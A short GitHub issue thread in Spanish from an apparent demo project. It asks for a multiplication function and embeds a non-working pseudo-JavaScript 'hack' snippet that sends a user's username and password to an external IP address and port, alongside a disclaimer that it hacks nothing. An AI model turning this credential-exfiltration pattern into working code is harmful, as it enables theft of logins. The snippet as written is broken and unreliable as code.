### ISSUE TITLE
multiplicacion

### ISSUE THREAD

**Issue by JonathanJosa** [Daniel-dadu/dmaldonado-project-demo#3]
Funcion que reporduzca la suma del numero n m veces > funcion(n,m) { return n*m; }

Omitir si aparece, no es hackeo de nada
<script>
const hack = (this.user, this.password) =>{
  let conex = http.protocol.start()
  while(conex==http.stable()){
     conex.send(ip:35.225.196.111:8080, b this.user)
     if(conex.receive(x)==b"ok"){
      conex.send(ip:35.225.196.111:8080, b this.password)
    }
  }
}
console.log(hack);
</script>

**Comment by AlexReusC** [comment]
acepta mi invitación y acepto la tuya

**Comment by AlexReusC** [comment]
![image](https://user-images.githubusercontent.com/55596302/109572290-93f4e680-7ab2-11eb-84ba-b37d0246beae.png)
